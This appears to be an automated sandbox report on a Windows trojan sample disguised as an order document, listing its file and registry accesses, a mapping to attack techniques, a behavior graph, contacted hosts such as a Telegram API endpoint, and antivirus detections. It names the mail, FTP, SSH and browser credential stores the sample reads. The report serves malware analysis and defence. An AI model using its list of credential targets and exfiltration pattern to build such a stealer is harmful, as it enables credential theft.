        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Users\user\AppData\Roaming\WsdnBq.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Users\user\AppData\Roaming\WsdnBq.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
        Source: Yara matchFile source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: Yara matchFile source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
        Source: Yara matchFile source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation
        1
        Scheduled Task/Job
        111
        Process Injection
        1
        Disable or Modify Tools
        2
        OS Credential Dumping
        1
        File and Directory Discovery
        Remote Services11
        Archive Collected Data
        Exfiltration Over Other Network Medium1
        Web Service
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Scheduled Task/Job
        Boot or Logon Initialization Scripts1
        Scheduled Task/Job
        1
        Deobfuscate/Decode Files or Information
        21
        Input Capture
        114
        System Information Discovery
        Remote Desktop Protocol2
        Data from Local System
        Exfiltration Over Bluetooth1
        Ingress Tool Transfer
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
        Obfuscated Files or Information
        1
        Credentials in Registry
        311
        Security Software Discovery
        SMB/Windows Admin Shares1
        Email Collection
        Automated Exfiltration11
        Encrypted Channel
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
        Software Packing
        NTDS1
        Process Discovery
        Distributed Component Object Model21
        Input Capture
        Scheduled Transfer3
        Non-Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets131
        Virtualization/Sandbox Evasion
        SSH1
        Clipboard Data
        Data Transfer Size Limits14
        Application Layer Protocol
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common131
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Application Window Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items111
        Process Injection
        DCSync1
        Remote System Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        System Network Configuration Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 764027 Sample: ORDER (6256 OS)#391 PI.exe Startdate: 09/12/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Sigma detected: Scheduled temp file as task from temp location 2->49 51 14 other signatures 2->51 7 WsdnBq.exe 5 2->7         started        10 ORDER (6256 OS)#391 PI.exe 6 2->10         started        process3 file4 53 Multi AV Scanner detection for dropped file 7->53 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->55 57 May check the online IP address of the machine 7->57 61 2 other signatures 7->61 13 WsdnBq.exe 14 3 7->13         started        17 schtasks.exe 1 7->17         started        29 C:\Users\user\AppData\Roaming\WsdnBq.exe, PE32 10->29 dropped 31 C:\Users\user\AppData\Local\...\tmpF47D.tmp, XML 10->31 dropped 33 C:\Users\...\ORDER (6256 OS)#391 PI.exe.log, ASCII 10->33 dropped 59 Injects a PE file into a foreign processes 10->59 19 ORDER (6256 OS)#391 PI.exe 15 3 10->19         started        21 schtasks.exe 1 10->21         started        23 ORDER (6256 OS)#391 PI.exe 10->23         started        signatures5 process6 dnsIp7 35 54.91.59.199, 443, 49697 AMAZON-AESUS United States 13->35 37 api.ipify.org 13->37 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->63 65 Tries to steal Mail credentials (via file / registry access) 13->65 67 Tries to harvest and steal ftp login credentials 13->67 69 Tries to harvest and steal browser information (history, passwords, etc) 13->69 25 conhost.exe 17->25         started        39 api.telegram.org 149.154.167.220, 443, 49696, 49698 TELEGRAMRU United Kingdom 19->39 41 api.ipify.org.herokudns.com 3.232.242.170, 443, 49695 AMAZON-AESUS United States 19->41 43 2 other IPs or domains 19->43 71 Installs a global keyboard hook 19->71 27 conhost.exe 21->27         started        signatures8 process9

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        ORDER (6256 OS)#391 PI.exe31%ReversingLabsByteCode-MSIL.Trojan.Taskun
        ORDER (6256 OS)#391 PI.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\WsdnBq.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\WsdnBq.exe31%ReversingLabsByteCode-MSIL.Trojan.Taskun
        SourceDetectionScannerLabelLinkDownload
        4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.fontbureau.comT.TTF0%URL Reputationsafe
        http://www.fontbureau.comiona0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        https://api.telegram.org40%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/00%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/.0%URL Reputationsafe
        http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
        http://www.fontbureau.com90%URL Reputationsafe
        http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.fontbureau.comR.TTF0%URL Reputationsafe
        http://www.galapagosdesign.com/0%URL Reputationsafe
        http://www.fontbureau.comF0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/T0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/K0%URL Reputationsafe
        http://www.fontbureau.comto0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/oie.0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
        http://www.fontbureau.comFQO0%Avira URL Cloudsafe
        http://www.fontbureau.comd0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.fontbureau.comedFB0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/Y0-eo0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.fontbureau.como0%URL Reputationsafe
        http://www.fontbureau.comals0%URL Reputationsafe
        http://www.fontbureau.comttod0%Avira URL Cloudsafe
        http://www.fontbureau.comd.0%Avira URL Cloudsafe
        http://www.fontbureau.comessedK0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/QO0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/hu-h0%Avira URL Cloudsafe
